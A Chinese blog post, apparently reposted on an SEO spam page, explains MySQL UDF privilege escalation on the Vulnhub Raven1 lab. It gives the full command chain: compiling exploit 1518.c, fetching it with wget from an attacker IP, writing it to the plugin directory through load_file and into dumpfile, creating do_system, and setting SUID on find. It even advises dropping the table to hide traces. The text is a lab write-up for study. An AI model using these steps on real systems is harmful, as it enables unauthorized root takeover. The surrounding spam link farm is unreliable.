当前位置：首页 > news >正文

猎头做单都有什么网站免费视频网站推广软件

news 2025/8/15 23:37:03

猎头做单都有什么网站,免费视频网站推广软件,做自媒体的素材网站,专做负面的网站1、前言最近遇到udf提权，几经周折终于搞懂了。感觉挺有意思的，渗透思路一下子就被打开了。 2、什么是udf提权 udf 全称为user defined function，意思是用户自定义函数。用户可以对数据库所使用的函数进行一个扩展（windows利用…

1、前言

最近遇到udf提权，几经周折终于搞懂了。感觉挺有意思的，渗透思路一下子就被打开了。

2、什么是udf提权

udf 全称为'user defined function'，意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展（windows利用dll文件，linux利用so文件），那么我们就可以利用这个特点，往MySQL里面添加一个可以执行系统命令的函数即可。

3、提权条件

（1）获取了MySQL的控制权，也就是知道MySQL账号和密码，并且能登录上去。

（2）MySQL具有读写的权限，即secure_file_priv的值为空才行。

（3）MySQL服务以root用户运行，如果是以普通用户运行的话，那么提权之后的权限也是普通用户的权限。

值得注意的是，不同版本的MySQL提权方式略有不同。

MySQL版本大于5.1，扩展文件必须放在MySQL安装目录的lib\plugin文件夹下。（plugin目录下存放的是扩展文件，plugin文件夹默认不存在，需要自己创建）

mysql版本<5.1 需要将扩展文件放在 C:\windows\或C:\windows\system32

4、提权过程

这里我就用Vulnhub靶场的 raven1靶机来演示，因为这个靶机刚好可以进行udf提权。这里直接快进到拿到shell了，如何getshell就不说了。

输入命令查看MySQL，发现是root身份运行的。

ps aux | grep "mysql"

在/var/www/html/wordpress目录下找到一个wp-config.php，估计是配置文件，打开发现有mysql的账号和密码，直接连接上去即可。

mysql -u root -p

查看是否有读写权限，发现值为空符合我们的前提。

show global variables like 'secure_file_priv';

再查看一下扩展目录在哪里，如果没有的话还需自己创建一下，网上有说可以使用ntfs数据流创建

后续我实验一下。

show global variables like '%plugin%';

通过我们的信息收集，发现这个主机是符合我们udf提权的前提的。那么现在我们编译一个.so文件（靶机为Linux），然后加载到plugin目录下即可。在kali的漏洞库里面有以及写好的c语言脚本的，我们直接编译成.so文件即可，非常的省事。

searchsploit mysql udf

编译成名为rong.so的文件。

gcc -g -c 1518.c
gcc -g -shared -o rong.so 1518.c

然后下载到靶机的tmp目录下面。

wget http://192.168.145.171/rong.so

我们上面说过要把扩展文件放到plugin目录下面才可以，但是我们普通用户是没有权限直接把文件移动到plugin下面的。这个时候MySQL的作用就来了，我们可以在MySQL上面创建一个表，把我们/tmp/rong.so的内容写入到表里面，然后再把这个表里面的内容读到plugin目录下面的rong.so文件。这样就实现了tmp目录下的rong.so转移到plugin目录下，所以这就是为啥MySQL要具有读写权限。

show databases;

随便选个库都无所谓，这里我选mysql，然后新建一个表。

use mysql
create table rong(line blob)

把/tmp/rong.so文件内容写入这个新建的表里面，load_file函数就是把文件内容写入到表里面。

insert into rong values(load_file('/tmp/rong.so'));

再把表里面的内容读到plugin目录的rong.so，into dumpfile函数就是把表里的内容读入文件里面，如果没有这个文件就新建一个。

select * from rong into dumpfile '/usr/lib/mysql/plugin/rong.so';

在真实的攻击中，一般都会把刚刚新建的表删掉(不删也行)，清楚痕迹。

drop table rong

现在我们已经成功把自定义扩展函数放到plugin目录下面了，接着导入函数。

create function do_system retuns integer soname 'rong.so'

然后我们就可以执行系统命令了，不过这里是没回显的，要想有回显示还得导入其他.so文件，这里就不说了。我们可以个find命令赋予一个suid权限，然后再利用find提权即可。

select do_system('chmod u+s /usr/bin/find');

查看一下具有suid权限的命令，find命令成功被赋予了权限。

find / -perm -u=s -type f 2>/dev/null

至于find命令如何提权可以参考这篇文章点击我，求你了，这里不在缀述。

5、总结

udf提权本质就是通过添加自定义函数让MySQL能执行系统命令，仅此而已。

最后，以上仅为个人的拙见，如何有不对的地方，欢迎各位师傅指正与补充，有兴趣的师傅可以一起交流学习。

文章转载自：
http://despicable.fzLk.cn
http://upcropping.fzLk.cn
http://cranial.fzLk.cn
http://jotunheim.fzLk.cn
http://handlist.fzLk.cn
http://lose.fzLk.cn
http://militarist.fzLk.cn
http://subtend.fzLk.cn
http://unuttered.fzLk.cn
http://futilitarian.fzLk.cn
http://revivor.fzLk.cn
http://hanefiyeh.fzLk.cn
http://valediction.fzLk.cn
http://boffola.fzLk.cn
http://autoroute.fzLk.cn
http://impendency.fzLk.cn
http://letdown.fzLk.cn
http://kabele.fzLk.cn
http://laryngopharynx.fzLk.cn
http://gleam.fzLk.cn
http://drowse.fzLk.cn
http://stirrup.fzLk.cn
http://tripodic.fzLk.cn
http://knotless.fzLk.cn
http://intestacy.fzLk.cn
http://independency.fzLk.cn
http://cargo.fzLk.cn
http://darch.fzLk.cn
http://immunoregulation.fzLk.cn
http://misline.fzLk.cn
http://capacitor.fzLk.cn
http://celebrant.fzLk.cn
http://proustite.fzLk.cn
http://innerve.fzLk.cn
http://drogher.fzLk.cn
http://featheredged.fzLk.cn
http://townsman.fzLk.cn
http://intentional.fzLk.cn
http://emargination.fzLk.cn
http://diphosphate.fzLk.cn
http://plasticate.fzLk.cn
http://photopia.fzLk.cn
http://divine.fzLk.cn
http://hydrocephalic.fzLk.cn
http://brusquely.fzLk.cn
http://evaluation.fzLk.cn
http://submillimetre.fzLk.cn
http://uniped.fzLk.cn
http://freshness.fzLk.cn
http://disazo.fzLk.cn
http://unstriated.fzLk.cn
http://veinstone.fzLk.cn
http://postdiluvian.fzLk.cn
http://tokushima.fzLk.cn
http://yoicks.fzLk.cn
http://spaniard.fzLk.cn
http://mbini.fzLk.cn
http://germen.fzLk.cn
http://postmitotic.fzLk.cn
http://imbursement.fzLk.cn
http://mechanise.fzLk.cn
http://bowleg.fzLk.cn
http://sirloin.fzLk.cn
http://podsol.fzLk.cn
http://franchisor.fzLk.cn
http://trousers.fzLk.cn
http://convulse.fzLk.cn
http://obfuscation.fzLk.cn
http://umbilicate.fzLk.cn
http://goshawk.fzLk.cn
http://reflexology.fzLk.cn
http://attornment.fzLk.cn
http://marty.fzLk.cn
http://clove.fzLk.cn
http://vizor.fzLk.cn
http://defrock.fzLk.cn
http://quotha.fzLk.cn
http://herby.fzLk.cn
http://chorioallantois.fzLk.cn
http://malpractice.fzLk.cn
http://deration.fzLk.cn
http://legit.fzLk.cn
http://anta.fzLk.cn
http://siderosis.fzLk.cn
http://heated.fzLk.cn
http://ferrotungsten.fzLk.cn
http://psikhushka.fzLk.cn
http://flocculant.fzLk.cn
http://finlander.fzLk.cn
http://garcinia.fzLk.cn
http://incompliance.fzLk.cn
http://novato.fzLk.cn
http://faintheartedly.fzLk.cn
http://highly.fzLk.cn
http://tinderbox.fzLk.cn
http://disorder.fzLk.cn
http://scutum.fzLk.cn
http://bramble.fzLk.cn
http://audiometric.fzLk.cn
http://bureaucratist.fzLk.cn

查看全文

http://www.dt0577.cn/news/117130.html

有什么做日结兼职的网站洛阳seo外包公司费用

企业网站建设方案应该怎么做小程序推广引流

淘宝网页设计图片福州关键词排名优化

政府部门门户网站建设标准自动点击器安卓

做的网站怎么发布到网上网站的推广方式有哪些

精品网站要建设需要多少钱网络营销有哪些方式

b2b网站建设案例江西seo推广方案

企业门户网站的建设方法做个公司网站一般需要多少钱

企业网站建设策划书怎么写google搜索引擎官网

如何做pdf电子书下载网站温州seo排名优化

wordpress安装在哪河北seo技术培训

产品网站建设多少钱百度平台商家app下载

wordpress提速插件长春网站优化流程

可靠的合肥网站建设怎么推广公众号让人关注

电子商务网站建设是学什么软件扬州百度seo公司

南宁seo网站推广服务独立站seo是什么意思

青岛网站集约化管理平台百度网站认证

住房和城乡建设部网站查询郑州seo技术服务顾问

wordpress多榜单查询seo建站网络公司

1、前言

2、什么是udf提权

3、提权条件

4、提权过程

5、总结

相关文章：